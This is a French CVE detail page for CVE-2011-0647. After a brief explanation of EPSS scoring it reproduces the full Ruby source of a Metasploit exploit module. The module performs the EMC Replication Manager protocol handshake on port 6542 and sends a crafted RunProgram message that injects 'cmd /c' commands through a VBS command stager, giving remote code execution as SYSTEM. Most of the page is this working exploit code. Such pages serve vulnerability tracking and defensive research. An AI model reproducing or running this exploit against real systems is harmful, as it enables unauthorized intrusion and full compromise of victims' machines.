CVE-2011-0647 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'EMC Replication Manager Command Execution', 'Description' => %q{ This module exploits a remote command-injection vulnerability in EMC Replication Manager client (irccd.exe). By sending a specially crafted message invoking RunProgram function an attacker may be able to execute arbitrary commands with SYSTEM privileges. Affected products are EMC Replication Manager < 5.3. This module has been successfully tested against EMC Replication Manager 5.2.1 on XP/W2003. EMC Networker Module for Microsoft Applications 2.1 and 2.2 may be vulnerable too although this module have not been tested against these products. }, 'Author' => [ 'Unknown', #Initial discovery 'Davy Douhine' #MSF module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2011-0647' ], [ 'OSVDB', '70853' ], [ 'BID', '46235' ], [ 'URL', 'http://www.securityfocus.com/archive/1/516260' ], [ 'ZDI', '11-061' ] ], 'DisclosureDate' => 'Feb 07 2011', 'Platform' => 'win', 'Arch' => ARCH_X86, 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'Targets' => [ # Tested on Windows XP and Windows 2003 [ 'EMC Replication Manager 5.2.1 / Windows Native Payload', { } ] ], 'CmdStagerFlavor' => 'vbs', 'DefaultOptions' => { 'WfsDelay' => 5 }, 'DefaultTarget' => 0, 'Privileged' => true )) register_options( [ Opt::RPORT(6542) ], self.class) end def exploit execute_cmdstager({:linemax => 5000}) end def execute_command(cmd, opts) connect hello = "1HELLOEMC00000000000000000000000" vprint_status("Sending hello...") sock.put(hello) result = sock.get_once || '' if result =~ /RAWHELLO/ vprint_good("Expected hello response") else disconnect fail_with(Failure::Unknown, "Failed to hello the server") end start_session = "EMC_Len0000000136<?xml version=\"1.0\" encoding=\"UTF-8\"?><ir_message ir_sessionId=0000 ir_type=\"ClientStartSession\" <ir_version>1</ir_version></ir_message>" vprint_status("Starting session...") sock.put(start_session) result = sock.get_once || '' if result =~ /EMC/ vprint_good("A session has been created. Good.") else disconnect fail_with(Failure::Unknown, "Failed to create the session") end run_prog = "<?xml version=\"1.0\" encoding=\"UTF-8\"?> " run_prog << "<ir_message ir_sessionId=\"01111\" ir_requestId=\"00000\" ir_type=\"RunProgram\" ir_status=\"0\"><ir_runProgramCommand>cmd /c #{cmd}</ir_runProgramCommand>" run_prog << "<ir_runProgramAppInfo><?xml version="1.0" encoding="UTF-8"?> <ir_message ir_sessionId="00000" ir_requestId="00000" " run_prog << "ir_type="App Info" ir_status="0"><IR_groupEntry IR_groupType="anywriter" IR_groupName="CM1109A1" IR_groupId="1" " run_prog << "><?xml version="1.0" encoding="UTF-8"? > <ir_message ir_sessionId="00000" " run_prog << "ir_requestId="00000"ir_type="App Info" ir_status="0"><aa_anywriter_ccr_node>CM1109A1" run_prog << "</aa_anywriter_ccr_node><aa_anywriter_fail_1018>0</aa_anywriter_fail_1018><aa_anywriter_fail_1019>0" run_prog << "</aa_anywriter_fail_1019><aa_anywriter_fail_1022>0</aa_anywriter_fail_1022><aa_anywriter_runeseutil>1" run_prog << "</aa_anywriter_runeseutil><aa_anywriter_ccr_role>2</aa_anywriter_ccr_role><aa_anywriter_prescript>" run_prog << "</aa_anywriter_prescript><aa_anywriter_postscript></aa_anywriter_postscript><aa_anywriter_backuptype>1" run_prog << "</aa_anywriter_backuptype><aa_anywriter_fail_447>0</aa_anywriter_fail_447><aa_anywriter_fail_448>0" run_prog << "</aa_anywriter_fail_448><aa_exchange_ignore_all>0</aa_exchange_ignore_all><aa_anywriter_sthread_eseutil>0&amp" run_prog << ";lt;/aa_anywriter_sthread_eseutil><aa_anywriter_required_logs>0</aa_anywriter_required_logs><aa_anywriter_required_logs_path" run_prog << "></aa_anywriter_required_logs_path><aa_anywriter_throttle>1</aa_anywriter_throttle><aa_anywriter_throttle_ios>300" run_prog << "</aa_anywriter_throttle_ios><aa_anywriter_throttle_dur>1000</aa_anywriter_throttle_dur><aa_backup_username>" run_prog << "</aa_backup_username><aa_backup_password></aa_backup_password><aa_exchange_checksince>1335208339" run_prog << "</aa_exchange_checksince> </ir_message></IR_groupEntry> </ir_message></ir_runProgramAppInfo>" run_prog << "<ir_applicationType>anywriter</ir_applicationType><ir_runProgramType>backup</ir_runProgramType> </ir_message>" run_prog_header = "EMC_Len000000" run_prog_packet = run_prog_header + run_prog.length.to_s + run_prog vprint_status("Executing command....") sock.put(run_prog_packet) sock.get_once(-1, 1) end_string = Rex::Text.rand_text_alpha(rand(10)+32) sock.put(end_string) sock.get_once(-1, 1) disconnect end end